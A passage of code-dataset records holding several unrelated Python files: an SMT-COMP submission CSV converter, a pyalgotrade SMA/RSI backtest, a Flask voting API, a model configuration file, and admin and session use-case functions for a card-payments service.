TRACK_CLOUD_RAW)\n\nTRACK_SINGLE_QUERY_REGEX='track_single_query_regex'\nTRACK_INCREMENTAL_REGEX='track_incremental_regex'\nTRACK_UNSAT_CORE_REGEX='track_unsat_core_regex'\nTRACK_MODEL_VALIDATION_REGEX='track_model_validation_regex'\nTRACK_PROOF_EXHIBITION_REGEX='track_proof_exhibition_regex'\nTRACK_PARALLEL_REGEX='track_parallel_regex'\nTRACK_CLOUD_REGEX='track_cloud_regex'\n\nclass ColumnNames:\n def __init__(self, year):\n self.colnames_base(year)\n if year >= 2022:\n self.colnames_2022()\n if year >= 2023:\n self.colnames_2023()\n\n def colnames_2023(self):\n self.SYSDESCR = 'System description URL (note that the system description is already part of the submission of the preliminary solvers).'\n\n def colnames_2022(self):\n self.STAREXEC_SOLVERID = 'StarExec ID of your preliminary solver. If you have different solver ids for several track, please provide them as \"12345,12346(uc),12347(inc)\". 
The tracks are single-query (sq), unsat-core (uc), incremental (inc), model-validation (mv), proof-exhibition (pe).'\n self.SINGLE_QUERY_TRACK = 'For the Single-Query Track, give a regular expression for the supported logics.'\n self.INCREMENTAL_TRACK = 'For the Incremental Track, give a regular expression for the supported logics.'\n self.MODEL_VALIDATION_TRACK = 'For the Model-Validation Track, give a regular expression for the supported logics.'\n self.UNSAT_CORE_TRACK = 'For the Unsat-Core Track, give a regular expression for the supported logics.'\n self.PROOF_EXHIBITION_TRACK = 'For the Proof-Exhibition Track, give a regular expression for the supported logics.'\n self.PARALLEL_TRACK = 'For the Parallel Track, give a regular expression for the supported logics. (You need to register for the parallel track separately)'\n self.CLOUD_TRACK = 'For the Cloud Track, give a regular expression for the supported logics. (You need to register for the cloud track separately)'\n\n def colnames_base(self, year):\n rules = \"rules\" if year >= 2021 else f\"rules{year - 2000}\"\n self.USERNAME = 'Username'\n self.SOLVER_NAME = 'Name of Solver'\n self.SOLVER_HOMEPAGE = 'Solver homepage'\n self.SYSDESCR = 'System description URL'\n self.SYSDESCR_TITLE = 'Title of the system description'\n self.STAREXEC_LINK = 'Link to StarExec solver'\n self.SINGLE_QUERY_TRACK = 'Select all divisions in the Single-Query (previously: Main) Track and the Unsat-Core Track to submit the solver to: '\n self.INCREMENTAL_TRACK = 'Select all divisions in the Incremental Track to submit the solver to:'\n self.MODEL_VALIDATION_TRACK = 'Select all divisions in the Model-Validation Track to submit the solver to:'\n self.VARIANT = 'If this solver is a VARIANT of another submission, e.g. an experimental version, provide the name and the StarExec ID of the main solver, otherwise leave blank.'\n self.WRAPPER = f'If this solver is a WRAPPER TOOL (i.e., it includes and calls one or more other SMT solvers, see Section 4 of the competition rules at https://smt-comp.github.io/{year}/{rules}.pdf), list ALL wrapped solvers and their exact version here, otherwise leave blank.'\n self.DERIVED = f'If this solver is a DERIVED TOOL (i.e., any solver that is based on or extends another SMT solver, see Section 4 of the competition rules at https://smt-comp.github.io/{year}/{rules}.pdf), provide the name of the original tool here. 
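These 2022 form fields collect one regular expression per track; a toy run of the full-match filtering they feed into (this mirrors the find_matches helper defined later in this record, with arbitrary example logic names):

import re

def find_matching_logics(logics, regexstr):
    # keep only the logic names the submitted regex matches in full
    pattern = re.compile(regexstr)
    return [l for l in logics if re.fullmatch(pattern, l)]

print(find_matching_logics(['QF_BV', 'QF_UF', 'BV', 'UFLIA'], 'QF_.*'))
# -> ['QF_BV', 'QF_UF']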
A derived tool should follow the naming convention [name-of-base-solver]-[my-solver-name].'\n self.TEAM = 'Please list all contributors that you wish to be acknowledged here'\n self.SEED = 'Seed'\n self.HOMEPAGE = 'Solver homepage'\n self.SYSDESCR = 'System description URL'\n self.SYSDESCR_NAME = 'Title of the system description'\n\n\n# Print error message and exit.\ndef die(msg):\n print(\"error: {}\".format(msg))\n sys.exit(1)\n\ndef find_matches(logics, regexstr):\n regex = re.compile(regexstr)\n return [ l for l in logics if re.fullmatch(regex, l) ]\n\ndef collect_logics_regex(submission, drow, divisions):\n assert divisions is not None\n submission[TRACK_SINGLE_QUERY_REGEX] = drow[col.SINGLE_QUERY_TRACK]\n submission[TRACK_INCREMENTAL_REGEX] = drow[col.INCREMENTAL_TRACK]\n submission[TRACK_UNSAT_CORE_REGEX] = drow[col.UNSAT_CORE_TRACK]\n submission[TRACK_MODEL_VALIDATION_REGEX] = drow[col.MODEL_VALIDATION_TRACK]\n submission[TRACK_PROOF_EXHIBITION_REGEX] = drow[col.PROOF_EXHIBITION_TRACK]\n submission[TRACK_PARALLEL_REGEX] = drow[col.PARALLEL_TRACK]\n submission[TRACK_CLOUD_REGEX] = drow[col.CLOUD_TRACK]\n\n submission[TRACK_SINGLE_QUERY_RAW] = find_matches(divisions[TRACK_SINGLE_QUERY_RAW], drow[col.SINGLE_QUERY_TRACK])\n submission[TRACK_MODEL_VALIDATION_RAW] = find_matches(divisions[TRACK_MODEL_VALIDATION_RAW], drow[col.MODEL_VALIDATION_TRACK])\n submission[TRACK_UNSAT_CORE_RAW] = find_matches(divisions[TRACK_UNSAT_CORE_RAW], drow[col.UNSAT_CORE_TRACK])\n submission[TRACK_INCREMENTAL_RAW] = find_matches(divisions[TRACK_INCREMENTAL_RAW], drow[col.INCREMENTAL_TRACK])\n submission[TRACK_PROOF_EXHIBITION_RAW] = find_matches(divisions[TRACK_PROOF_EXHIBITION_RAW], drow[col.PROOF_EXHIBITION_TRACK])\n submission[TRACK_PARALLEL_RAW] = find_matches(divisions[TRACK_PARALLEL_RAW], drow[col.PARALLEL_TRACK])\n submission[TRACK_CLOUD_RAW] = find_matches(divisions[TRACK_CLOUD_RAW], drow[col.CLOUD_TRACK])\n\ndef collect_logics_2021(submission, drow):\n \"\"\"Collect logics for single-query and unsat core track.\n\n The form had a section with SQ and UC track as matrix.\n The resulting csv thus had logic columns that stated which\n tracks are entered for these two tracks.\"\"\"\n submission[TRACK_INCREMENTAL_RAW] = drow[col.INCREMENTAL_TRACK].split(';')\n submission[TRACK_MODEL_VALIDATION_RAW] = drow[col.MODEL_VALIDATION_TRACK].split(';')\n submission[TRACK_SINGLE_QUERY_RAW] = []\n submission[TRACK_UNSAT_CORE_RAW] = []\n for key, value in drow.items():\n if not key.startswith(col.SINGLE_QUERY_TRACK):\n continue\n logic = key.replace(col.SINGLE_QUERY_TRACK, '')\n if not value:\n continue\n assert logic[0] == '['\n assert logic[-1] == ']'\n logic = logic[1:-1]\n tracks = value.split(';')\n if 'Single-Query Track' in tracks:\n submission[TRACK_SINGLE_QUERY_RAW].append(logic)\n if 'Unsat Core Track' in tracks:\n submission[TRACK_UNSAT_CORE_RAW].append(logic)\n\n\ndef normalize_whitespace(drow):\n for key in drow.keys():\n drow[key] = re.sub(r'\\s+', ' ', drow[key])\n drow[key] = drow[key].strip()\n\n\n# Read csv with submissions data from Google Form.\ndef read_csv(col, fname, year, division):\n global g_submissions, g_logics_all\n with open(fname) as file:\n reader = csv.reader(file, delimiter=',')\n header = next(reader)\n g_submissions = []\n\n for row in reader:\n drow = dict(zip(iter(header), iter(row)))\n normalize_whitespace(drow)\n submission = dict()\n submission['username'] = drow[col.USERNAME]\n submission['solver_name'] = drow[col.SOLVER_NAME]\n if year < 2022:\n m = re.search(\n 
'solver\\.jsp\\?id=(\\d+)', drow[col.STAREXEC_LINK])\n assert(m)\n submission['solver_id'] = m.group(1)\n else:\n submission['solver_id'] = drow[col.STAREXEC_SOLVERID]\n m = re.search('solver\\.jsp\\?id=(\\d+)', drow[col.VARIANT])\n if not m:\n submission['variant'] = drow[col.VARIANT]\n else:\n submission['variant'] = m.group(1)\n submission['wrapper'] = drow[col.WRAPPER]\n submission['derived'] = drow[col.DERIVED]\n submission['team'] = drow[col.TEAM]\n submission['seed'] = drow[col.SEED]\n submission['homepage'] = drow[col.HOMEPAGE]\n submission['sysdescr_url'] = drow[col.SYSDESCR]\n submission['sysdescr_name'] = drow[col.SYSDESCR_NAME]\n\n if year < 2022:\n collect_logics_2021(submission, drow)\n else:\n collect_logics_regex(submission, drow, divisions)\n\n if (not submission[TRACK_INCREMENTAL_RAW] and\n not submission[TRACK_MODEL_VALIDATION_RAW] and\n not submission[TRACK_SINGLE_QUERY_RAW] and\n not submission[TRACK_UNSAT_CORE_RAW] and\n not submission[TRACK_PROOF_EXHIBITION_RAW] and\n not submission[TRACK_PARALLEL_RAW] and\n not submission[TRACK_CLOUD_RAW]):\n die(f'Solver \"{drow[col.SOLVER_NAME]}\" '\\\n 'does not participate in any track')\n\n g_submissions.append(submission)\n\n\n# Write csv with uniform submission data of the form:\n# solver_id | solver_name | single_query_track | ... other tracks\n# .... | .... | entered divisions | ...\n# Order of tracks: single query, incremental, challenge, model val, unsat core\n# Columns are separated by ',' and divisions are separated by ';'.\ndef write_csv_2021(fname):\n with open(fname, 'w') as outfile:\n outfile.write(\",\".join([\n \"Preliminary Solver ID\",\n \"Solver ID\",\n \"Wrapped Solver ID Single Query\",\n \"Wrapped Solver ID Incremental\",\n \"Wrapped Solver ID Model Validation\",\n \"Wrapped Solver ID Unsat Core\",\n \"Solver Name\",\n \"Solver homepage\",\n \"System description URL\",\n \"System description name\",\n \"Competing\",\n \"Single Query Track\",\n \"Incremental Track\",\n \"Model Validation Track\",\n \"Unsat Core Track\",\n \"Variant Of\",\n \"Wrapper Tool\",\n \"Derived Tool\",\n \"Contact\",\n \"Team Members\",\n \"Seed\",\n ]) + \"\\n\")\n for submission in g_submissions:\n outfile.write(\"{},-1,,,,,\\\"{}\\\",\\\"{}\\\",\\\"{}\\\",\\\"{}\\\",{},\"\n .format(\n submission['solver_id'],\n submission['solver_name'],\n submission['homepage'],\n submission['sysdescr_url'],\n submission['sysdescr_name'],\n \"yes\"))\n for track in [TRACK_SINGLE_QUERY_RAW,\n TRACK_INCREMENTAL_RAW,\n TRACK_MODEL_VALIDATION_RAW,\n TRACK_UNSAT_CORE_RAW]:\n if submission[track] == ['ALL']:\n outfile.write(\";\".join(g_logics_all[track]))\n else:\n outfile.write(\";\".join(submission[track]))\n outfile.write(\",\")\n outfile.write(\n \"\\\"{}\\\",\\\"{}\\\",\\\"{}\\\",\\\"{}\\\",\\\"{}\\\",{}\".format(\n submission['variant'],\n submission['wrapper'],\n submission['derived'],\n submission['username'],\n submission['team'],\n submission['seed']\n ))\n outfile.write(\"\\n\")\n\n# Write csv with uniform submission data of the form:\n# solver_id | solver_name | single_query_track | ... other tracks\n# .... | .... 
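Since divisions are ';'-joined inside a ','-separated file, any field that itself contains a comma must be quoted; a hedged sketch with the csv module (hypothetical row values) shows the intended shape:

import csv, io

buf = io.StringIO()
writer = csv.writer(buf, quoting=csv.QUOTE_MINIMAL)
# a solver name containing a comma is quoted; the division list stays one cell
writer.writerow(['1234', 'My,Solver', ';'.join(['QF_BV', 'QF_UF'])])
print(buf.getvalue().strip())  # 1234,"My,Solver",QF_BV;QF_UF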
| entered divisions | ...\n# Order of tracks: single query, incremental, challenge, model val, unsat core\n# Columns are separated by ',' and divisions are separated by ';'.\ndef write_csv_2022(fname):\n    with open(fname, 'w') as outfile:\n        outfile.write(\",\".join([\n            \"Preliminary Solver ID\",\n            \"Solver ID\",\n            \"Config ID Single Query\",\n            \"Config ID Incremental\",\n            \"Config ID Model Validation\",\n            \"Config ID Unsat Core\",\n            \"Config ID Proof Exhibition\",\n            \"Solver Name\",\n            \"Solver homepage\",\n            \"System description URL\",\n            \"System description name\",\n            \"Competing\",\n            \"Single Query Regex\",\n            \"Incremental Regex\",\n            \"Model Validation Regex\",\n            \"Unsat Core Regex\",\n            \"Proof Exhibition Regex\",\n            \"Cloud Regex\",\n            \"Parallel Regex\",\n            \"Single Query Track\",\n            \"Incremental Track\",\n            \"Model Validation Track\",\n            \"Unsat Core Track\",\n            \"Proof Exhibition Track\",\n            \"Cloud Track\",\n            \"Parallel Track\",\n            \"Variant Of\",\n            \"Wrapper Tool\",\n            \"Derived Tool\",\n            \"Contact\",\n            \"Team Members\",\n            \"Seed\",\n        ]) + \"\\n\")\n        for submission in g_submissions:\n            outfile.write(\"{},-1,,,,,,\\\"{}\\\",\\\"{}\\\",\\\"{}\\\",\\\"{}\\\",{},\"\n                    .format(\n                        re.sub(r',',';', submission['solver_id']),\n                        submission['solver_name'],\n                        submission['homepage'],\n                        submission['sysdescr_url'],\n                        submission['sysdescr_name'],\n                        \"yes\"))\n            for track in [TRACK_SINGLE_QUERY_REGEX,\n                          TRACK_INCREMENTAL_REGEX,\n                          TRACK_MODEL_VALIDATION_REGEX,\n                          TRACK_UNSAT_CORE_REGEX,\n                          TRACK_PROOF_EXHIBITION_REGEX,\n                          TRACK_CLOUD_REGEX,\n                          TRACK_PARALLEL_REGEX]:\n                outfile.write(f'\"{submission[track]}\",')\n            for track in [TRACK_SINGLE_QUERY_RAW,\n                          TRACK_INCREMENTAL_RAW,\n                          TRACK_MODEL_VALIDATION_RAW,\n                          TRACK_UNSAT_CORE_RAW,\n                          TRACK_PROOF_EXHIBITION_RAW,\n                          TRACK_CLOUD_RAW,\n                          TRACK_PARALLEL_RAW]:\n                outfile.write(\";\".join(submission[track]))\n                outfile.write(\",\")\n            outfile.write(\n                \"\\\"{}\\\",\\\"{}\\\",\\\"{}\\\",\\\"{}\\\",\\\"{}\\\",{}\".format(\n                    submission['variant'],\n                    submission['wrapper'],\n                    submission['derived'],\n                    submission['username'],\n                    submission['team'],\n                    submission['seed']\n                ))\n            outfile.write(\"\\n\")\n\n\nif __name__ == '__main__':\n    parser = ArgumentParser(\n        usage=\"extract_data_from_submission \"\\\n              \" \\n\\n\"\n              \"Extract and convert csv data from submission form into \"\n              \"uniformly formatted csv.\")\n    parser.add_argument(\"year\", type=int,\n                        help=\"the year of the competition\")\n    parser.add_argument(\"-d\", \"--division\", type=str, dest=\"division\",\n                        help=\"division.json file with tracks and logics\",\n                        required=False)\n    parser.add_argument (\n        \"in_csv\", help=\"the input submissions csv from Google Forms\")\n    parser.add_argument (\n        \"out_csv\", help=\"the output csv\")\n    args = parser.parse_args()\n\n    if not os.path.exists(args.in_csv):\n        die(\"file not found: {}\".format(args.in_csv))\n\n    if args.division:\n        with open(args.division) as file:\n            divisions = json.load(file)\n    else:\n        divisions = None\n\n    col = ColumnNames(args.year)\n    read_csv(col, args.in_csv, args.year, divisions)\n    if args.year >= 2022:\n        write_csv_2022(args.out_csv)\n    else:\n        write_csv_2021(args.out_csv)  # was write_csv, which is not defined anywhere\n","sub_path":"tools/prep/extract_data_from_submission.py","file_name":"extract_data_from_submission.py","file_ext":"py","file_size_in_byte":16115,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
+{"seq_id":"610927940","text":"from pyalgotrade import strategy\nfrom pyalgotrade.barfeed import quandlfeed\nfrom pyalgotrade.technical import ma, rsi\nfrom typing import 
Union\n\n\ndef safe_round(value: Union[float, None], digits: int) -> Union[float, None]:\n if value is not None:\n value = round(value, digits)\n return value\n\n\nclass FirstSmaRsiStrategy(strategy.BacktestingStrategy):\n def __init__(self, feed, instrument):\n super(FirstSmaRsiStrategy, self).__init__(feed)\n self.__instrument = instrument\n self.__sma = ma.SMA(feed[instrument].getCloseDataSeries(), 15)\n self.__rsi = rsi.RSI(feed[instrument].getCloseDataSeries(), 14)\n return\n \n def onBars(self, bars):\n bar = bars[self.__instrument]\n self.info('{} {} {}'.format(bar.getClose(), safe_round(self.__rsi[-1], 2), safe_round(self.__sma[-1], 2)))\n return\n\nfeed = quandlfeed.Feed()\nfeed.addBarsFromCSV('orcl', 'WIKI-ORCL-2000-quandl.csv')\n\nstrat = FirstSmaRsiStrategy(feed, 'orcl')\nstrat.run()\n","sub_path":"first-sma-rsi-strategy.py","file_name":"first-sma-rsi-strategy.py","file_ext":"py","file_size_in_byte":996,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"516940315","text":"import json\nimport os\n\nfrom db import db, User, Take, Vote\nfrom flask import Flask, request\n\napp = Flask(__name__)\ndb_filename = \"takes.db\"\n\napp.config[\"SQLALCHEMY_DATABASE_URI\"] = \"sqlite:///%s\" % db_filename\napp.config[\"SQLALCHEMY_TRACK_MODIFICATIONS\"] = False\napp.config[\"SQLALCHEMY_ECHO\"] = True\n\ndb.init_app(app)\nwith app.app_context():\n db.create_all()\n\ndef success_response(data, code=200):\n return json.dumps({\"success\": True, \"data\": data}), code\n\ndef failure_response(message, code=404):\n return json.dumps({\"success\": False, \"error\": message}), code\n\n\n\n@app.route(\"/\")\n\n# User Routes\n@app.route(\"/api/users/\")\ndef get_users():\n return success_response( [ u.serialize() for u in User.query.all() ] )\n\n@app.route(\"/api/users/\", methods=[\"POST\"])\ndef create_user():\n body = json.loads(request.data)\n username = body.get(\"username\")\n email = body.get(\"email\")\n if username is None or email is None:\n return failure_response(\"Must provide a username and email\")\n new_user = User(username=body.get(\"username\"), email=body.get(\"email\"))\n db.session.add(new_user)\n db.session.commit()\n return success_response(new_user.serialize(), 201)\n\n@app.route(\"/api/users//\", methods=[\"DELETE\"])\ndef delete_user(user_id):\n user = User.query.filter_by(id=user_id).first()\n if user is None:\n return failure_response(\"User not found\")\n db.session.delete(user)\n db.session.commit()\n return success_response(user.serialize())\n\n\n# Take Routes\n@app.route(\"/api/users//takes/\", methods=[\"POST\"])\ndef create_user_take(user_id):\n user = User.query.filter_by(id=user_id).first()\n if user is None:\n return failure_response(\"User not found\")\n body = json.loads(request.data)\n text = body.get(\"text\")\n if text is None:\n return failure_response(\"Must provide a take\")\n new_take = Take(text=body.get(\"text\"), user=user)\n db.session.add(new_take)\n user.takes.append(new_take)\n db.session.commit()\n return success_response(new_take.serialize())\n\n@app.route(\"/api/users//takes/\")\ndef get_user_takes(user_id):\n user = User.query.filter_by(id=user_id).first()\n if user is None:\n return failure_response(\"User not found\")\n return success_response( [ t.serialize_with_votes() for t in Take.query.filter_by(user_id=user_id).all() ] )\n\n\n# Vote Routes\n@app.route(\"/api/takes//votes/\", methods=[\"POST\"])\ndef vote(take_id):\n take = Take.query.filter_by(id=take_id).first()\n if take is None:\n 
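A hedged usage sketch of the success/failure JSON envelope above, driven through Flask's test client; the import path assumes this module is importable as app, which may differ in the actual project layout.

from app import app as takes_app

client = takes_app.test_client()
resp = client.post('/api/users/',
                   json={'username': 'ada', 'email': 'ada@example.com'})
print(resp.status_code)             # 201 when creation succeeds
print(resp.get_data(as_text=True))  # {"success": true, "data": {...}}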
return failure_response(\"Take not found\")\n body = json.loads(request.data)\n vote = body.get(\"vote\")\n if vote is None:\n return failure_response(\"User must vote\")\n new_vote = Vote(vote=body.get(\"vote\"))\n db.session.add(new_vote)\n if body.get(\"vote\")==True:\n take.upvotes.append(new_vote)\n else:\n take.downvotes.append(new_vote)\n db.session.commit()\n return success_response(new_vote.serialize())\n\nif __name__ == \"__main__\":\n port = int(os.environ.get(\"PORT\", 5000))\n app.run(host='0.0.0.0', port=port)\n","sub_path":"backend/src/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3100,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"641913325","text":"\"\"\"\nParameters to be loaded into the main model. \n\"\"\"\nimport time\n\n# user inputs (CHANGE HERE!) \n# ==========================================================\n# QUERY_IMAGE_PATH \t\t= '../data/bed/002.500.46.jpg'\n# QUERY_IMAGE_PATH \t\t= '../data/bed/002.392.33.jpg'\n# QUERY_IMAGE_PATH \t\t= '../data/bed/690.272.95.jpg'\nLIB_TYPE \t\t\t\t= 'chair'\nIMAGE_LIBRARY_PATH \t\t= '../data/' + LIB_TYPE + '/'\nFEATURE_LIBRARY_PATH \t= '../output/indexes/feat_lib_' + LIB_TYPE + '/'\nSAVE_LIB \t\t\t\t= False\n# LAYER_NAMES \t\t\t= ['block1_conv1', 'block1_conv2']\nLAYER_NAMES\t\t\t\t= None\n\nQUERY_IMAGE_PATH \t\t= '../data/objects/902.782.77.jpg'\n\nMODEL_TYPE \t\t\t\t= 'transfer_learn' # 'transfer_learn' # 'vgg16' or 'transfer_learn'\nMODEL_PATH\t\t\t\t= '../output/final_model.h5'\n\nOUTPUT_IMAGE_PATH \t\t= '../output/out-' + time.strftime('%Y%m%d-%H%M') + '.png'\n# OUTPUT_IMAGE_PATH\t\t= f'../output/{LIB_TYPE}-out-{LAYER_NAMES[0]}-{LAYER_NAMES[1]}.png'\nN_RESULTS \t\t\t\t= 4\n\n# ==========================================================\n\n# ignore these\nIMAGE_SIZE = 500\nIMAGE_WIDTH = IMAGE_SIZE\nIMAGE_HEIGHT = IMAGE_SIZE\n\n# VGG16 layer names for content and style extraction\nCONTENT_LAYERS = [\"block2_conv2\"]\nSTYLE_LAYERS = [\"block1_conv2\", \"block2_conv2\", \"block3_conv3\", \"block4_conv3\", \"block5_conv3\"]","sub_path":"pair/configs.py","file_name":"configs.py","file_ext":"py","file_size_in_byte":1252,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"28579640","text":"import csv\n\nfrom pydantic import BaseModel\n\nfrom app.common import logger, errors\nfrom app.usecases.context import Context\n\nfrom app.domain import admins, sessions\nfrom app.domain import wallets\nfrom app.domain import clients\nfrom app.domain import customers\nfrom app.domain import card_proxies\n\nfrom app.common import security as sek\nfrom app.common import json as json_util\n\nfrom app.services import fis_client\n\n\n#\n# Shared Outputs\n#\nclass AdminOut(BaseModel):\n admin_id: int\n identifier: str\n first_name: str\n last_name: str\n status: str\n level: str\n client_id: int\n created_at: str\n updated_at: str\n title: str = \"\"\n\n @staticmethod\n def from_admin(d):\n return AdminOut(\n admin_id=d.admin_id,\n identifier=d.identifier,\n first_name=d.first_name,\n last_name=d.last_name,\n status=d.status,\n level=d.level,\n client_id=d.client_id,\n created_at=d.created_at,\n updated_at=d.updated_at,\n title=d.title,\n )\n\n\n\n#\n# writes\n#\nasync def create(ctx: Context, identifier, passphrase, first_name, last_name,\n client_id, level, title=\"\"):\n sa_repo = admins.AdminsRepo(ctx.db)\n c_repo = clients.ClientsRepo(ctx.db)\n\n exists = await sa_repo.get_by_identifier(identifier)\n \n if exists:\n 
return False, errors.E['admins_identifier_exists']\n\n    # ensure that the client and wallet exist\n    client_exists = await c_repo.get_by_client_id(client_id)\n    if not client_exists:\n        return False, errors.E['admins_invalid_client_id']\n    \n    rec = await sa_repo.create(identifier, passphrase, first_name, last_name,\n                               client_id, level, title=title)\n\n    if rec:\n        return True, admins.Admin.from_record(rec)    \n    else:\n        return False, errors.E['admins_unable_to_create']\n\nasync def load_from_csvfile(ctx: Context, client_id, file_path):\n    c_repo = customers.CustomersRepo(ctx.db)\n    sa_repo = admins.AdminsRepo(ctx.db)\n    added = []\n    not_added = []\n\n    with open(file_path, 'r') as csvfile:\n        reader = csv.DictReader(csvfile)\n        for row in reader:\n            user_exists = await c_repo.get_by_identifier(row['Mobile Number'])\n            \n            if user_exists:\n                print(f\"about to load {row['Amount']} for user with phone number {row['Mobile Number']} and with clientID {user_exists['client_id']} \")\n                # NOTE: the actual balance load is not implemented; we only record who matched\n                added.append({'identifier': row['Mobile Number']})\n            else:\n                not_added.append(row['Mobile Number'])\n            \n        _added = [a['identifier'] for a in added]\n        return True, _added, not_added\n\n\nasync def disable(ctx: Context, admin_id):\n    changed = await _change_status(ctx, admin_id, admins.STATUS_INACTIVE,\n                                   errors.E['admins_unable_to_disable'])\n    return changed\n\n\nasync def enable(ctx: Context, admin_id):\n    changed = await _change_status(ctx, admin_id, admins.STATUS_ACTIVE,\n                                   errors.E['admins_unable_to_enable'])\n    return changed\n\n\nasync def _change_status(ctx: Context, admin_id, status, failure_message):\n    sa_repo = admins.AdminsRepo(ctx.db)\n\n    exists = await sa_repo.get_by_admin_id(admin_id)    \n\n    if not exists:\n        return False, errors.E['admins_id_not_found']\n\n    rec = await sa_repo.change_status(admin_id, status)\n\n    if rec:\n        return True, admins.Admin.from_record(rec)\n    else:\n        return False, failure_message\n\n\n#\n# reads\n#\nasync def view_admin(ctx: Context, admin_id):\n    sa_repo = admins.AdminsRepo(ctx.db)\n    rec = await sa_repo.get_by_admin_id(admin_id)\n\n    if rec:\n        return True, admins.Admin.from_record(rec)\n    else:\n        return False, errors.E['admins_id_not_found']\n\n\nasync def get_all_admins(ctx: Context, client_id):\n    sa_repo = admins.AdminsRepo(ctx.db)\n    recs = await sa_repo.get_all_admins(client_id)\n    found = [admins.Admin.from_record(r) for r in recs]\n\n    return True, found\n\n\nasync def search_admins(ctx: Context, client_id=None):\n    sa_repo = admins.AdminsRepo(ctx.db)\n\n    if client_id:\n        recs = await sa_repo.search(client_id=client_id)\n    else:\n        recs = await sa_repo.search()\n\n    return True, [admins.Admin.from_record(r) for r in recs]\n\n\nasync def check_status(ctx: Context, proxy):\n    sa_repo = admins.AdminsRepo(ctx.db)\n\n    cust = await sa_repo.check_status(proxy)\n\n    if cust:\n        return True, admins.Admin.from_record(cust)\n    else:\n        return False, errors.E['proxy_key_not_found']  # was errors.E('proxy_key_not_found'); E is a mapping, not a callable\n\n\nasync def check_customer_card_balance(ctx: Context, admin_id, customer_id):\n    # ensure that this admin can view this customer's information\n    can_do = await _admin_can_view_customer(ctx, admin_id, customer_id)\n    if not can_do:    \n        return False, errors.E['admins_invalid_customer_access']\n\n    r_repo = card_proxies.CustomerCardProxiesRepo(ctx.db)\n\n    cust_proxy = await r_repo.get_customer_active_proxy(customer_id)\n    if not cust_proxy:\n        return False, errors.E['customers_no_active_proxy']\n\n    fis_res, fis_data = await fis_client.get_proxy_balance(cust_proxy['proxy'])\n    if not fis_res:\n        return False, errors.E['customers_unable_to_retrieve_balance']\n\n    fis_parsed = fis_client.parse_pipe_response(fis_data)\n    res_data = {\n        'current_balance': 
fis_parsed[0],\n 'proxy': fis_parsed[1],\n 'customer_id': customer_id\n }\n\n return True, res_data\n\n\nasync def check_customer_card_status(ctx: Context, admin_id, customer_id):\n # ensure that this admin can view this customer's information\n can_do = await _admin_can_view_customer(ctx, admin_id, customer_id)\n if not can_do: \n return False, errors.E['admins_invalid_customer_access']\n\n r_repo = card_proxies.CustomerCardProxiesRepo(ctx.db)\n\n cust_proxy = await r_repo.get_customer_active_proxy(customer_id)\n if not cust_proxy:\n return False, errors.E['customers_no_active_proxy']\n\n fis_res, fis_data = await fis_client.get_proxy_status(cust_proxy['proxy'])\n\n if not fis_res:\n return False, errors.E['customers_unable_to_retrieve_proxy_status']\n\n fis_parsed = fis_client.parse_pipe_response(fis_data)\n res_data = {\n 'proxy_status': fis_parsed[0].lower(),\n 'exp_date': fis_parsed[1],\n 'proxy': cust_proxy['proxy'],\n 'customer_id': customer_id\n }\n\n return True, res_data\n\n\n#\n# helpers\n#\nasync def do_login(ctx: Context, identifier, passphrase):\n sa_repo = admins.AdminsRepo(ctx.db)\n s_repo = sessions.SessionsRepo(ctx.redis)\n\n rec = await sa_repo.get_by_identifier(identifier)\n if not rec:\n return False, None, errors.E['admins_identifier_not_found']\n\n if rec['admin_status'] != admins.STATUS_ACTIVE:\n return False, None, errors.E['admins_not_active']\n\n pass_match = sek.pass_match(passphrase, rec['passphrase'])\n if not pass_match:\n return False, None, errors.E['admins_invalid_credentials']\n\n honeypot = sessions.gen_session_key()\n session_id = sessions.gen_session_key()\n ses_key = sessions.make_session_key(session_id)\n\n rec_data = sessions.record_to_dict(rec)\n rec_data['honeypot'] = honeypot\n\n _entity_type = sessions.ENTITY_TYPE_STORE_ADMIN\n if rec['level'] == admins.LEVEL_COMPANY:\n _entity_type = sessions.ENTITY_TYPE_COMPANY_ADMIN\n\n data = await s_repo.create(session_id,\n ses_key,\n rec['admin_id'],\n _entity_type,\n rec_data)\n ret_data = {\n 'admin_id': rec['admin_id'],\n 'identifier': rec['identifier'],\n 'admin_status': rec['admin_status'],\n 'level': rec['level'],\n 'honeypot': honeypot,\n 'session_id': session_id\n }\n\n return True, session_id, ret_data\n\n\nasync def do_logout(ctx: Context, session_id):\n s_repo = sessions.SessionsRepo(ctx.redis)\n ses_key = sessions.make_session_key(session_id)\n\n data = await s_repo.get(ses_key)\n\n if not data:\n return False, errors.E['admins_invalid_authorization']\n\n deleted = await s_repo.remove(ses_key)\n if not deleted:\n return False, errors.E['admins_unable_to_clear_session']\n\n return True, deleted\n\n\nasync def view_session(ctx: Context, session_id):\n s_repo = sessions.SessionsRepo(ctx.redis)\n ses_key = sessions.make_session_key(session_id)\n\n data = await s_repo.get(ses_key)\n if not data:\n return False, errors.E['admins_invalid_authorization']\n\n ret_data = {\n 'admin_id': data['entity_id'],\n 'identifier': data['data']['identifier'],\n 'admin_status': data['data']['admin_status'],\n 'level': data['data']['level'],\n 'honeypot': data['data']['honeypot'],\n 'session_id': session_id\n }\n\n return True, ret_data\n\n\nasync def _admin_can_view_customer(ctx: Context, admin_id, customer_id):\n sa_repo = admins.AdminsRepo(ctx.db)\n c_repo = customers.CustomersRepo(ctx.db)\n \n # initially just checking that the customer and admin are of the same client\n # unclear if we need to limit this to a specific store...\n _admin = await sa_repo.get_by_admin_id(admin_id)\n _customer = await 
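parse_pipe_response is an external fis_client helper; judging from the positional indexing above it returns the fields of a '|'-separated payload. A hypothetical stand-in (the payload format here is an assumption, not documented behavior):

def parse_pipe_response(raw):
    # assumed upstream shape: 'ACTIVE|2025-12|1234' -> ['ACTIVE', '2025-12', '1234']
    return raw.strip().split('|')

print(parse_pipe_response('ACTIVE|2025-12|1234'))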
c_repo.get_by_customer_id(customer_id)\n\n    return _admin['client_id'] == _customer['client_id']\n","sub_path":"main-service-master/mount/app/usecases/admins.py","file_name":"admins.py","file_ext":"py","file_size_in_byte":9213,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
